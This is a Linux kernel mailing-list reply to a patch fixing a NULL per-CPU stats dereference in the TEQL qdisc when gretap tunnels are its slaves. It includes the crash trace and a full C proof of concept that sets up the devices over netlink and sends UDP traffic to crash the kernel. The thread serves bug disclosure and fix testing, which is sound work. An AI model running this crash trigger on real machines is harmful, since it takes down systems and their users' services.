Re: [PATCH] net/sched: teql: fix NULL pointer dereference in iptunnel_xmit on TEQL slave xmit
From: Xiang Mei
Date: Wed Mar 04 2026 - 00:23:22 EST
On Wed, Mar 04, 2026 at 12:42:18PM +0800, bestswngs@xxxxxxxxx wrote:
> From: Weiming Shi <bestswngs@xxxxxxxxx>
>
> teql_master_xmit() calls netdev_start_xmit(skb, slave) to transmit
> through slave devices, but does not update skb->dev to the slave device
> beforehand.
>
> When a gretap tunnel is a TEQL slave, the transmit path reaches
> iptunnel_xmit() which saves dev = skb->dev (still pointing to teql0
> master) and later calls iptunnel_xmit_stats(dev, pkt_len). This
> function does:
>
> get_cpu_ptr(dev->tstats)
>
> Since teql_master_setup() does not set dev->pcpu_stat_type to
> NETDEV_PCPU_STAT_TSTATS, the core network stack never allocates tstats
> for teql0, so dev->tstats is NULL. get_cpu_ptr(NULL) computes
> NULL + __per_cpu_offset[cpu], resulting in a page fault.
>
> BUG: unable to handle page fault for address: ffff8880e6659018
> #PF: supervisor write access in kernel mode
> #PF: error_code(0x0002) - not-present page
> PGD 68bc067 P4D 68bc067 PUD 0
> Oops: Oops: 0002 [#1] SMP KASAN PTI
> RIP: 0010:iptunnel_xmit (./include/net/ip_tunnels.h:664 net/ipv4/ip_tunnel_core.c:89)
> Call Trace:
> <TASK>
> ip_tunnel_xmit (net/ipv4/ip_tunnel.c:847)
> __gre_xmit (net/ipv4/ip_gre.c:478)
> gre_tap_xmit (net/ipv4/ip_gre.c:779)
> teql_master_xmit (net/sched/sch_teql.c:319)
> dev_hard_start_xmit (net/core/dev.c:3887)
> sch_direct_xmit (net/sched/sch_generic.c:347)
> __dev_queue_xmit (net/core/dev.c:4802)
> neigh_direct_output (net/core/neighbour.c:1660)
> ip_finish_output2 (net/ipv4/ip_output.c:237)
> __ip_finish_output.part.0 (net/ipv4/ip_output.c:315)
> ip_mc_output (net/ipv4/ip_output.c:369)
> ip_send_skb (net/ipv4/ip_output.c:1508)
> udp_send_skb (net/ipv4/udp.c:1195)
> udp_sendmsg (net/ipv4/udp.c:1485)
> inet_sendmsg (net/ipv4/af_inet.c:859)
> __sys_sendto (net/socket.c:2206)
>
> Fix this by setting skb->dev = slave before calling
> netdev_start_xmit(), so that tunnel xmit functions see the correct
> slave device with properly allocated tstats.
>
> Fixes: 039f50629b7f ("ip_tunnel: Move stats update to iptunnel_xmit()")
> Reported-by: Xiang Mei <xmei5@xxxxxxx>
> Signed-off-by: Weiming Shi <bestswngs@xxxxxxxxx>
> ---
> net/sched/sch_teql.c | 1 +
> 1 file changed, 1 insertion(+)
>
> diff --git a/net/sched/sch_teql.c b/net/sched/sch_teql.c
> index 6e4bdaa876ed..783300d8b019 100644
> --- a/net/sched/sch_teql.c
> +++ b/net/sched/sch_teql.c
> @@ -315,6 +315,7 @@ static netdev_tx_t teql_master_xmit(struct sk_buff *skb, struct net_device *dev)
> if (__netif_tx_trylock(slave_txq)) {
> unsigned int length = qdisc_pkt_len(skb);
>
> + skb->dev = slave;
> if (!netif_xmit_frozen_or_stopped(slave_txq) &&
> netdev_start_xmit(skb, slave, slave_txq, false) ==
> NETDEV_TX_OK) {
> --
> 2.43.0
>
Here is a PoC for your ref and please test the poc on the kernel enabled
```
CONFIG_NET_SCHED=y # qdisc framework
CONFIG_NET_SCH_TEQL=y # the buggy TEQL qdisc
CONFIG_NET_IPGRE_DEMUX=y # GRE demux
CONFIG_NET_IPGRE=y # gretap tunnel
CONFIG_NET_IP_TUNNEL=y # ip tunnel core
```
```c
// PoC: TEQL iptunnel_xmit NULL tstats page fault
//
// Bug: When a gretap device is a TEQL slave and transmits a packet,
// iptunnel_xmit() reads skb->dev to update per-CPU tunnel stats.
// However, skb->dev still points to the teql0 master device (not
// the gretap slave), and teql0 does not allocate dev->tstats.
// This causes a NULL pointer dereference in iptunnel_xmit_stats().
//
// Root Cause:
// teql_master_xmit() calls netdev_start_xmit(skb, slave, ...) to
// send the skb through a gretap slave. However, it does NOT set
// skb->dev = slave beforehand. Neither does netdev_start_xmit(),
// gre_tap_xmit(), __gre_xmit(), nor ip_tunnel_xmit().
//
// So when iptunnel_xmit() saves dev = skb->dev (line 57 of
// ip_tunnel_core.c), dev is still teql0, not gretapN.
//
// After ip_local_out(), iptunnel_xmit_stats(dev, pkt_len) calls:
// get_cpu_ptr(dev->tstats)
//
// teql0->tstats is NULL because teql_master_setup() does not set
// dev->pcpu_stat_type = NETDEV_PCPU_STAT_TSTATS, so the core
// network stack never allocates tstats for teql0.
//
// get_cpu_ptr(NULL) computes: NULL + __per_cpu_offset[cpu]
// = __per_cpu_offset[0] (the GS base), which may point to an
// unmapped page (PUD=0), causing a page fault.
//
// Call trace:
// sendto() [userspace]
// udp_sendmsg
// ip_send_skb -> ip_mc_output -> ip_finish_output2
// neigh_direct_output -> __dev_queue_xmit(teql0)
// sch_direct_xmit -> dev_hard_start_xmit
// teql_master_xmit
// netdev_start_xmit(skb, gretapN) <-- skb->dev still = teql0
// gre_tap_xmit -> __gre_xmit
// ip_tunnel_xmit -> iptunnel_xmit
// dev = skb->dev = teql0 <-- teql0, NOT gretapN!
// ip_local_out(...)
// iptunnel_xmit_stats(dev, ...)
// get_cpu_ptr(dev->tstats) <-- dev->tstats == NULL
// CRASH: page fault
//
// Topology:
// teql0 (master, 10.1.1.1/24)
// gretap1..7 (TEQL slaves, remotes 10.1.1.2..8, routed via teql0)
// Static ARP entries on teql0 for 10.1.1.2..8
//
// Trigger: send multicast or unicast UDP through teql0
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/if_link.h>
#include <linux/if_tunnel.h>
#include <linux/neighbour.h>
#include <linux/pkt_sched.h>
#include <arpa/inet.h>
extern unsigned int if_nametoindex(const char *__ifname);
#ifndef IFF_UP
#define IFF_UP 0x1
#endif
struct nlmsg {
char *pos;
int nesting;
struct nlattr *nested[8];
char buf[8192];
};
static void nl_init(struct nlmsg *nlmsg, int typ, int flags,
const void *data, int size)
{
memset(nlmsg, 0, sizeof(*nlmsg));
struct nlmsghdr *hdr = (struct nlmsghdr *)nlmsg->buf;
hdr->nlmsg_type = typ;
hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | flags;
memcpy(hdr + 1, data, size);
nlmsg->pos = (char *)(hdr + 1) + NLMSG_ALIGN(size);
}
static void nl_attr(struct nlmsg *nlmsg, int typ, const void *data, int size)
{
struct nlattr *attr = (struct nlattr *)nlmsg->pos;
attr->nla_len = sizeof(*attr) + size;
attr->nla_type = typ;
if (size > 0) memcpy(attr + 1, data, size);
nlmsg->pos += NLMSG_ALIGN(attr->nla_len);
}
static void nl_nest(struct nlmsg *nlmsg, int typ)
{
struct nlattr *attr = (struct nlattr *)nlmsg->pos;
attr->nla_type = typ;
nlmsg->pos += sizeof(*attr);
nlmsg->nested[nlmsg->nesting++] = attr;
}
static void nl_done(struct nlmsg *nlmsg)
{
struct nlattr *attr = nlmsg->nested[--nlmsg->nesting];
attr->nla_len = nlmsg->pos - (char *)attr;
}
static int nl_send(struct nlmsg *nlmsg, int sock)
{
struct nlmsghdr *hdr = (struct nlmsghdr *)nlmsg->buf;
hdr->nlmsg_len = nlmsg->pos - nlmsg->buf;
struct sockaddr_nl addr = { .nl_family = AF_NETLINK };
ssize_t n = sendto(sock, nlmsg->buf, hdr->nlmsg_len, 0,
(struct sockaddr *)&addr, sizeof(addr));
if (n != (ssize_t)hdr->nlmsg_len) return -1;
n = recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0);
if (n < (ssize_t)(sizeof(struct nlmsghdr) + sizeof(struct nlmsgerr)))
return -1;
hdr = (struct nlmsghdr *)nlmsg->buf;
if (hdr->nlmsg_type == NLMSG_ERROR) {
int err = -((struct nlmsgerr *)(hdr + 1))->error;
if (err) { errno = err; return -err; }
}
return 0;
}
static int dev_updown(int sock, struct nlmsg *nlmsg, const char *name, int up)
{
struct ifinfomsg hdr = {};
hdr.ifi_index = if_nametoindex(name);
if (!hdr.ifi_index) return -1;
hdr.ifi_flags = up ? IFF_UP : 0;
hdr.ifi_change = IFF_UP;
nl_init(nlmsg, RTM_NEWLINK, 0, &hdr, sizeof(hdr));
int ret = nl_send(nlmsg, sock);
printf(" %s %s: %s\n", up ? "up" : "down", name, ret ? strerror(errno) : "ok");
return ret;
}
static int add_addr4(int sock, struct nlmsg *nlmsg, const char *dev,
const char *addr_str, int prefix)
{
struct ifaddrmsg hdr = {};
hdr.ifa_family = AF_INET;
hdr.ifa_prefixlen = prefix;
hdr.ifa_index = if_nametoindex(dev);
struct in_addr addr;
inet_pton(AF_INET, addr_str, &addr);
nl_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
nl_attr(nlmsg, IFA_LOCAL, &addr, sizeof(addr));
nl_attr(nlmsg, IFA_ADDRESS, &addr, sizeof(addr));
int ret = nl_send(nlmsg, sock);
printf(" addr %s %s/%d: %s\n", dev, addr_str, prefix, ret ? strerror(errno) : "ok");
return ret;
}
static int add_neigh4(int sock, struct nlmsg *nlmsg, const char *dev,
const char *addr_str, const unsigned char *mac)
{
struct ndmsg hdr = {};
hdr.ndm_family = AF_INET;
hdr.ndm_ifindex = if_nametoindex(dev);
hdr.ndm_state = 0x80; /* NUD_PERMANENT */
nl_init(nlmsg, RTM_NEWNEIGH, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
struct in_addr addr;
inet_pton(AF_INET, addr_str, &addr);
nl_attr(nlmsg, NDA_DST, &addr, sizeof(addr));
nl_attr(nlmsg, NDA_LLADDR, mac, 6);
int ret = nl_send(nlmsg, sock);
printf(" neigh %s %s: %s\n", dev, addr_str, ret ? strerror(errno) : "ok");
return ret;
}
static int create_gretap(int sock, struct nlmsg *nlmsg, const char *name,
uint32_t remote)
{
struct ifinfomsg hdr = {};
nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, sizeof(hdr));
nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);
nl_nest(nlmsg, IFLA_LINKINFO);
nl_attr(nlmsg, IFLA_INFO_KIND, "gretap", 6);
nl_nest(nlmsg, IFLA_INFO_DATA);
nl_attr(nlmsg, IFLA_GRE_REMOTE, &remote, sizeof(remote));
nl_done(nlmsg);
nl_done(nlmsg);
int ret = nl_send(nlmsg, sock);
printf(" create gretap %s: %s\n", name, ret ? strerror(errno) : "ok");
return ret;
}
static int replace_qdisc_teql(int sock, struct nlmsg *nlmsg, const char *dev)
{
struct tcmsg hdr = {};
hdr.tcm_family = AF_UNSPEC;
hdr.tcm_ifindex = if_nametoindex(dev);
hdr.tcm_handle = 0;
hdr.tcm_parent = 0xFFFFFFFF; /* TC_H_ROOT */
nl_init(nlmsg, RTM_NEWQDISC, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
nl_attr(nlmsg, TCA_KIND, "teql0", 6);
int ret = nl_send(nlmsg, sock);
printf(" qdisc %s -> teql0: %s\n", dev, ret ? strerror(errno) : "ok");
return ret;
}
int main(void)
{
printf("[*] PoC: TEQL iptunnel_xmit NULL tstats crash\n");
printf("[*] Bug: teql_master_xmit doesn't set skb->dev to slave device\n");
printf("[*] before calling netdev_start_xmit(skb, slave).\n");
printf("[*] So iptunnel_xmit() reads skb->dev = teql0 (master),\n");
printf("[*] but teql0->tstats is NULL -> page fault.\n\n");
int sock = socket(AF_NETLINK, SOCK_RAW, 0);
if (sock < 0) { perror("socket"); return 1; }
struct nlmsg nlmsg;
struct in_addr remote;
unsigned char fake_mac[6] = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55};
printf("[*] Step 1: Bring up loopback\n");
dev_updown(sock, &nlmsg, "lo", 1);
printf("[*] Step 2: Create gretap tunnels\n");
int num = 3;
char gname[16], rstr[32];
for (int i = 0; i < num; i++) {
snprintf(gname, sizeof(gname), "gretap%d", i + 1);
snprintf(rstr, sizeof(rstr), "10.1.1.%d", i + 2);
inet_pton(AF_INET, rstr, &remote);
create_gretap(sock, &nlmsg, gname, remote.s_addr);
}
printf("[*] Step 3: Bring up gretaps and attach teql0 qdisc\n");
for (int i = 0; i < num; i++) {
snprintf(gname, sizeof(gname), "gretap%d", i + 1);
dev_updown(sock, &nlmsg, gname, 1);
replace_qdisc_teql(sock, &nlmsg, gname);
}
printf("[*] Step 4: Configure teql0\n");
dev_updown(sock, &nlmsg, "teql0", 1);
add_addr4(sock, &nlmsg, "teql0", "10.1.1.1", 24);
printf("[*] Step 5: Add ARP entries\n");
for (int i = 0; i < num; i++) {
snprintf(rstr, sizeof(rstr), "10.1.1.%d", i + 2);
fake_mac[5] = 0x55 + i;
add_neigh4(sock, &nlmsg, "teql0", rstr, fake_mac);
}
printf("[*] Step 6: Send multicast through teql0 to trigger crash\n");
int fd = socket(AF_INET, SOCK_DGRAM, 0);
if (fd >= 0) {
setsockopt(fd, SOL_SOCKET, 25 /* SO_BINDTODEVICE */, "teql0", 6);
int ttl = 1;
setsockopt(fd, IPPROTO_IP, 33 /* IP_MULTICAST_TTL */, &ttl, sizeof(ttl));
struct sockaddr_in dst = {};
dst.sin_family = AF_INET;
dst.sin_port = htons(9999);
inet_pton(AF_INET, "224.0.0.1", &dst.sin_addr);
char buf[64] = "trigger";
for (int i = 0; i < 5; i++) {
ssize_t n = sendto(fd, buf, sizeof(buf), 0,
(struct sockaddr *)&dst, sizeof(dst));
printf(" send #%d: %zd (%s)\n", i, n, n < 0 ? strerror(errno) : "ok");
usleep(100000);
}
close(fd);
}
printf("[*] Also try unicast\n");
fd = socket(AF_INET, SOCK_DGRAM, 0);
if (fd >= 0) {
struct sockaddr_in dst = {};
dst.sin_family = AF_INET;
dst.sin_port = htons(9999);
inet_pton(AF_INET, "10.1.1.2", &dst.sin_addr);
char buf[64] = "trigger";
for (int i = 0; i < 5; i++) {
ssize_t n = sendto(fd, buf, sizeof(buf), 0,
(struct sockaddr *)&dst, sizeof(dst));
printf(" send #%d: %zd (%s)\n", i, n, n < 0 ? strerror(errno) : "ok");
usleep(100000);
}
close(fd);
}
printf("[*] Done. Check dmesg for BUG/Oops.\n");
sleep(3);
close(sock);
return 0;
}
```
Thanks,
Xiang